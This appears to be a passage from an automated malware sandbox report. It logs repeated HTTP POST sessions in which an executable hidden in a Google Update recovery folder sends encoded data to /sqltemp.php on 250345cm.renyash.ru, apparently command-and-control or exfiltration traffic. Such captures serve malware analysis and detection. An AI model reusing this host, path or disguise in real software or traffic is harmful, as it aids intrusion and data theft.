                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 50 2a 13 21 09 26 0b 2b 02 3f 3d 06 0c 26 2d 2e 11 28 01 36 14 30 00 2b 10 3e 00 33 1e 20 2c 29 59 32 16 27 01 37 03 05 12 33 1e 2b 59 05 1c 20 43 36 3c 23 03 2a 13 37 5d 26 2f 36 00 30 10 2f 01 2a 28 28 11 37 02 33 5b 33 03 20 5b 2a 29 23 0b 24 05 3f 5f 2e 06 3d 53 27 2a 2c 54 00 11 26 13 33 57 34 59 34 19 02 59 36 31 18 00 26 24 32 1b 32 3c 2b 19 23 5f 2e 59 32 21 33 13 21 33 0c 11 31 05 21 10 23 3e 2c 08 3e 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%P*!&+?=&-.(60+>3 ,)Y2'73+Y C6<#*7]&/60/*((73[3 [*)#$?_.=S'*,T&3W4Y4Y61&$22<+#_.Y2!3!31!#>,>%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  131192.168.2.662770104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:47.524353981 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:47.876281023 CET1124OUTData Raw: 56 52 5f 56 54 51 54 51 58 56 52 59 56 5c 59 55 5b 5a 54 5d 55 5b 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_VTQTQXVRYV\YU[ZT]U[PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-':4Y%Y0- 8V7/?)>4Z4 +%//W-:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:47.967863083 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:48.236311913 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=txu1DgKB0FrDV4QzKVEHfXsHutcpLlGZzdsD36%2FzXjQ1ekkQa75lH1p3bmPofVKYj1UWcvL0AZpxu11mxk1YWTQKjOcao1as8MpP4phxp8wbZLdli%2BRm09%2BEQNSSrZaoKFxCAjq4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365ec8aa243e2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1742&rtt_var=694&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=766404&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  132192.168.2.662771104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:48.364568949 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:48.721343994 CET1124OUTData Raw: 56 53 5f 50 54 5d 51 51 58 56 52 59 56 5b 59 53 5b 58 54 5d 55 55 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_PT]QQXVRYV[YS[XT]UUP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.')Z#?3 ;*24$+7T*>#2(+>1$::&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:48.828754902 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:48.998639107 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGMBHYphPvOArE9%2FWyyhUpqaj8IkBkxYhOTX%2B%2FA61yPlO1PbOJt77pTR7Zqlmat6ulMlZd4T3mg4%2BxtKhrqYyT%2BvbGrl001CZs5zIzm9eGD4ZHpcKz9xWvRDDcJnljEnYFQSZY0q"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365f1dd9b185d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3268&min_rtt=1494&rtt_var=4108&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=93076&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  133192.168.2.662772104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:49.129776001 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:49.485686064 CET1124OUTData Raw: 53 52 5f 51 54 5a 54 55 58 56 52 59 56 50 59 56 5b 53 54 58 55 5f 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SR_QTZTUXVRYVPYV[STXU_P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^36 ?]3?@;V4>#(*#>+ 1+Z?!A$<'.&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:49.582719088 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:49.755647898 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VvsdYdWnJOcb2wmMtpHtgwUsbdeiTKB9teCi1yABnBVd1YFxRNpxSsA2xke3M4FFgM0%2FdivJSJlBr%2FhJK0r2kkwxJu40kNW5JMmOmjTT2PU9zr1DPdp%2B8aORgPyJdm62y0yeE2Qy"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365f69d3a425c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4716&min_rtt=1787&rtt_var=6528&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57888&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  134192.168.2.662773104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:49.883611917 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:50.235635042 CET1124OUTData Raw: 56 51 5a 54 54 5e 54 56 58 56 52 59 56 5b 59 55 5b 5a 54 50 55 5e 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQZTT^TVXVRYV[YU[ZTPU^P^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y0\ 0>'C/:W7>8?U=>[4"]*862/,*&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:50.346214056 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:50.600403070 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x6eXNk2amSPXTFC2z95Kmaisr6KbLHCRxE1rqdm6sQoqa6IRqqzX4tHOO7VqV9b06Ca3XBcDgRLeRW%2Blfr0Q7U%2FlDMKxLHf7ikE7V11zL7mhWtnKgTuFV6Pyp0baQtqeD1EO0FJP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365fb58ff2365-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3391&min_rtt=1898&rtt_var=3699&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=105422&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  135192.168.2.662774104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:50.757451057 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:51.112605095 CET1124OUTData Raw: 56 57 5a 53 51 5c 51 57 58 56 52 59 56 5b 59 50 5b 52 54 58 55 5b 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VWZSQ\QWXVRYV[YP[RTXU[PYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$<5\"/"$X?8"!=#+9')?#!?Y+)D%?:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:51.208331108 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:51.479232073 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yyol%2BwmP%2FIHNY18HW%2B9q7LKLhBIzAry0OUlDKt6bTw1Ri%2Bik5lrk0mN84wNrmUjs2sn%2BslbJsP9rk2qyi7f1EWwH1YlYvrFAMJwtG2HcVmGCcPsHsTVdmDoYCeg0ysbKsF%2FXzL8i"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36600c8f0728d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8628&min_rtt=2021&rtt_var=13972&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=26603&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  136192.168.2.662775104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:51.617417097 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:51.970428944 CET1124OUTData Raw: 56 52 5f 5c 54 59 54 5c 58 56 52 59 56 5c 59 5e 5b 5f 54 5d 55 5e 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VR_\TYT\XVRYV\Y^[_T]U^P\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^3/!Z /*%>+E.*1U#0?:;*(X!2#(;-%<#R9:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:52.077397108 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:52.351999998 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Ft6EiBUPc9jtmf%2FLU1RN8p7zUjg%2B18jA%2F7yolSdQvHGxlmD5nVfvAp8%2FTh30hf7auChRLJwhrXDCobaykJpK1vATLRLmiK%2FtsNXEDXE49ZbabCKiPuHtGdtzxiQQ2vbmYpK7sYGf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb366063c6e4367-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3266&min_rtt=1629&rtt_var=3885&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=99151&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  137192.168.2.662776104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:52.493614912 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:52.845575094 CET1124OUTData Raw: 53 57 5f 52 51 58 54 56 58 56 52 59 56 5b 59 56 5b 5d 54 5f 55 55 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_RQXTVXVRYV[YV[]T_UUP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y3<"4Y1'.@8:# (: =>8X!!7]<2W9:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:52.946441889 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  138192.168.2.662777104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:53.133589029 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:53.485661983 CET1964OUTData Raw: 56 5f 5f 55 54 5a 54 55 58 56 52 59 56 5c 59 5f 5b 59 54 5a 55 5f 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V__UTZTUXVRYV\Y_[YTZU_PUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.X0<9Y","0-;@8\%W#(<).7!!7\?@2?V.:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:53.578053951 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:53.758378029 CET959INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FS036Cg60pdREnJBa4dBL0iY4%2FTzuOw9ITqyiqBBQPa%2F30yCHXmpH2Y6RhK8%2BBSw2w%2B1suA%2FRfZTou5r67DkzXLS6ba%2BI1F8G1qXc8x7KsrgurrT2GPUAOtisPSWby7DhJ1lofrj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3660f982919b2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=1951&rtt_var=780&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=748334&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 26 09 3d 2d 35 0c 24 22 34 10 2a 2d 24 0f 26 00 3d 00 28 5e 31 04 27 2d 33 5b 29 29 27 13 21 3c 2a 07 24 28 3c 5f 34 3e 30 00 24 0e 2b 59 05 1c 23 1c 35 01 2b 01 29 2d 37 14 25 2f 36 00 26 3e 34 5c 3c 16 2c 55 22 2b 2f 5f 30 03 1d 00 2a 04 20 1d 24 05 33 5c 2e 3f 31 55 24 3a 2c 54 00 11 26 56 24 1f 3b 05 34 19 3f 01 36 57 3d 5f 25 0a 2a 53 25 3c 0e 08 23 07 26 15 32 32 3b 5e 35 1d 26 59 27 3b 2d 10 37 3e 2f 50 29 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&=-5$"4*-$&=(^1'-3[))'!<*$(<_4>0$+Y#5+)-7%/6&>4\<,U"+/_0* $3\.?1U$:,T&V$;4?6W=_%*S%<#&22;^5&Y';-7>/P)>%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  139192.168.2.662778104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:53.257837057 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:53.610511065 CET1124OUTData Raw: 53 53 5f 52 51 5c 54 50 58 56 52 59 56 5b 59 54 5b 5e 54 5b 55 54 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_RQ\TPXVRYV[YT[^T[UTPTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._05Y"/\%=8;7((#W= 2#("&Y?-:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:53.698395014 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:53.951035023 CET815INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0B4RcVRMraAi9gFJGbL1mNA%2BOpcScrw0fGHah7gHHj%2BEGL1Lr1B0ao7Tl9zPDN9z8cFSK1YKL0%2BvbKD72fqWKCVw2ehfneSzN3kgpPYeI%2BRG%2FQGSzGzj3%2FL%2BvQ3NRBJ821%2FKTSE8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb366105f4c18c4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1508&rtt_var=1399&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=301528&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
